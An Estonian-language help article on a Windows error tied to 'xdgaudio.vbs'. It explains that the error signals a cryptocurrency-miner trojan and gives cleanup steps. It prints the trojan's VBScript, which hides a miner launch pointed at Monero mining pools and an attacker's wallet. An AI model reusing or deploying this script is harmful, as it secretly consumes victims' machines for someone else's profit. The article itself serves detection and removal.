Kui saate oma süsteemis järgmise tõrketeate, mis on seotud saidiga „xdgaudio.vbs”, on teie arvuti tõenäoliselt nakatunud.
Skript: C: \ windows \ xdgaudio.vbsRida: 3
Char: 1
Viga: süsteem ei leia määratud faili.
Kood: 80070002
Allikas: (null)
Notepadiga redigeerimisel võib skript sisaldada järgmisi ridu:
Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -px", 0 Set WShell = Nothing
See näeb kindlasti välja nagu CPU / cryptocurrency Mineri trooja, mis mitte ainult ei aeglusta teie arvutit, vaid võib samuti ohustada turvalisust. Skriptifailid c: \ windows \ xdgaudio.vbs ja c: \ windows \ servicecrsssr.vbs tuleks kustutada. Sellest ei piisa. Tehke Malwarebytes'i antimalware abil põhjalik kontroll ja skannige ka kasutatava viirusetõrjetarkvara abil.
Üksikasjalike juhiste saamiseks selle Miner Trooja eemaldamiseks lugege malwaretips.com juhendit Kuidas eemaldada CPU Miner Trojan Windowsist (viiruse abijuhend) .